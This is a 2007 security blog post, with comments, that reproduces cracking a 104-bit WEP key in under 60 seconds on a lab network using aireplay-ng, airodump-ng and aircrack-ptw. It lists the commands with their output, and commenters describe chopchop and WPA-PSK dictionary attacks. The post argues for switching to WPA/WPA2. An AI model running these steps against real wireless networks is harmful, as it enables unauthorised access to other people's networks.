What else do you need not to use WEP anymore?
Tonight (Yeah, I know, I should get more sleep!), while I was working on a wireless project you will hear about soon, I read the announcement of a paper titled "Breaking 104 bit WEP in less than 60 seconds". I couldn't wait to digest and test it, so impatiently, I prepared my wireless gear with the following setup:
I downloaded the tool, aircrack-ptw, that implements the paper improvements to derive the RC4 key used by WEP with as few as 40,000 frames (theoretically, around 60 seconds). I uncompressed and compiled the tool with a simple "make". However, before running "make" on BackTrack, be sure to edit the Makefile and move the "-lpcap" switch to the end of the gcc line for the "aircrack-ptw" target.
The Atheros cards use by default the madwifi-ng driver, so you need to follow step-by-step the pretty recent aircrack-ng WEP cracking tutorial (it contains all the specific details you need to test this). The tool needs the frames (PCAP files) to work, so you need to omit "--ivs" on Step 3, and instead of using the standard aircrack-ng, you must use the new aircrack-ptw tool (Step 5).
Let's see a summary of my setup and the results I got (...in less than 60 seconds?):
<plug> You can learn about this and other advanced wireless security techniques in the upcoming SANS Assessing and Securing Wireless Networks course in Brussels, June 25-30, 2007. </plug>
What else do you need to switch to WPA/WPA2? Vendors have no excuse not to implement WPA in every wireless device in 2007!!
UPDATE: This was "Breaking 104-bit WEP in less than 60 seconds". Check the next blog entry for breaking 40-bit WEP in less than...
- A 104-bit WEP-based 802.11g wireless network, using a Linksys WRT54GL access point running OpenWrt.
- A client laptop running Windows XP SP2 (with the Windows Wireless Update patch; come on, install it! ;)), using an Atheros wireless card.
- An auditor laptop running BackTrack 2 Final and using an Atheros wireless card too.
I downloaded the tool, aircrack-ptw, that implements the paper improvements to derive the RC4 key used by WEP with as few as 40,000 frames (theoretically, around 60 seconds). I uncompressed and compiled the tool with a simple "make". However, before running "make" on BackTrack, be sure to edit the Makefile and move the "-lpcap" switch to the end of the gcc line for the "aircrack-ptw" target.
The Atheros cards use by default the madwifi-ng driver, so you need to follow step-by-step the pretty recent aircrack-ng WEP cracking tutorial (it contains all the specific details you need to test this). The tool needs the frames (PCAP files) to work, so you need to omit "--ivs" on Step 3, and instead of using the standard aircrack-ng, you must use the new aircrack-ptw tool (Step 5).
Let's see a summary of my setup and the results I got (...in less than 60 seconds?):
- Step 1 - Put the card in monitor mode.
- Step 2 - Create a fake authentication from the auditor laptop:
# aireplay-ng -1 0 -e TheMatrix -a 00:18:39:86:F2:55 -h 00:13:46:73:F2:99 ath0
02:25:28 Sending Authentication Request
02:25:28 Authentication successful
02:25:28 Sending Association Request
02:25:28 Association successful :-)
- Step 3 - Run airodump to collect the traffic:
# airodump-ng -c 6 --bssid 00:18:39:86:F2:55 -w output ath0
CH 6 ][ Elapsed: 1 min ][ 2007-04-05 02:29
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:86:F2:55 54 100 812 49547 585 6 48. WEP WEP TheMatrix
BSSID STATION PWR Lost Packets Probes
00:18:39:86:F2:55 00:13:46:73:F2:99 63 0 26891
00:18:39:86:F2:55 00:13:46:98:03:BB 64 0 25522
- Step 4 - Capture and inject traffic in the form of ARP packets:
# aireplay-ng -3 -b 00:18:39:86:F2:55 -h 00-13-46-73-F2-99 ath0
Saving ARP requests in replay_arp-0405-022535.cap
You should also start airodump-ng to capture replies.
...
- Step 5 - Using my setup, injecting 40,000 valid frames took between 65-75 seconds. My first try revealed the key with near 46,000 frames:
# ./aircrack-ptw ../output-01.capThe result was not bad, but the paper/tool promise was much better. My second try only needed 42,000, but this still meant more than 60 seconds:
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:18:39:86:F2:55 keyindex=0
stats for bssid 00:18:39:86:F2:55 keyindex=0 packets=45937
Found key with len 13: CA FE CA FE CA FE CA FE CA FE CA FE CA
stats for bssid 00:18:39:86:F2:55 keyindex=0 packets=42648Third time's charm: 38653 frames and 59 seconds! ;)
stats for bssid 00:18:39:86:F2:55 keyindex=0 packets=38653Awesome results and advancements for auditing the security of WEP-based wireless networks!
<plug> You can learn about this and other advanced wireless security techniques in the upcoming SANS Assessing and Securing Wireless Networks course in Brussels, June 25-30, 2007. </plug>
What else do you need to switch to WPA/WPA2? Vendors have no excuse not to implement WPA in every wireless device in 2007!!
UPDATE: This was "Breaking 104-bit WEP in less than 60 seconds". Check the next blog entry for breaking 40-bit WEP in less than...
Labels: Wireless
posted by Raul Siles at 3:50 AM
4 Comments:
Authentication and association ( step 2.) works fine in open-wep mode. It doesn't work on shared-wep mode ;)...In this case I performed Korek chopchop attack with aireplay-n -4 -h mac_address ath0, recover RC4 keystream, generate forged arp request with arpforge-ng;). Wep is unbreakable with Airdefense wep cloaking tehnology http://www.tmcnet.com/usubmit/2007/04/02/2457867.htm .WPA-PSK(TKIP) and WPA2-PSK(AES)is also breakable...;) with aireplay-ng -0 10 bla,bla I performed deauthentication and deasssociation, capture WPA challenge/response authentication packets wits airodump , and finally crack the challenge/response with cowpatty or aircrack-ng -a 2....genpmk drasticaly help to precompute PMK to crack WPA(with cowpatty).
Hi anon,
Thanks for your comment!
It is true that the example only works for open-auth WEP-based networks. If the WEP network uses shared authentication, then you need to obtain PRGA in order to encrypt the challenge sent by the AP. There are multiple ways of getting PRGA, one is the Korek chopchop attack you mention, but you can also use a WEP-based fragmentation attack or the simplest method, wait for (or force) a valid client to connect to the network: airodump-ng will collect the PRGA required for you ;)
If you are interested on the details, check the aircrack-ng tutorial called "How to do shared key fake authentication ?".
Re the recently announced Airdefense WEP Cloaking feature, I strongly suggest everybody to read the following article by my good friend Joshua Wright, "AirDefense Perpetuates Flawed Protocols". You cannot secure WEP!! There are so many flaws on it that the smarter option for real security is to switch to WPA/WPA2. I know there are environments were this change would be too costly, but then, accept that a dedicated attacker will be able to break in.
Finally, re WPA/WPA2-PSK cracking, the current attack methods are based on dictionary-attacks, trying to guess the pre-shared key if it is based on a dictionary word or it's guessable. This is why the 802.11i specification recommends passphrases of 20 chars or more, and I suggest to use 64-char random passphrases, such as the ones generated by GRC's password generator. If you don't trust Steve Gibson, mix the characters obtained from multiple invocations ;)
Good article by Joshua but I think he is agreeing that WEP cloaking works in at least one case. Or, is it really possible to decipher inspite of WEP cloaking?
The real situation nowadays is that we are all waiting to have access to a packet capture for the WEP Cloaking countermeasures, because, it seems relatively easy to discern between the real WEP packets and the ones generated by the protection system (sequence numbers, signal levels...).
It seems that even AirDefense comments on the SF WiFiSec list a few months ago ratified that, because they clarified WEP Cloaking is an extra layer of security for its WiFi defense in-depth architecture.
Post a Comment
<< Home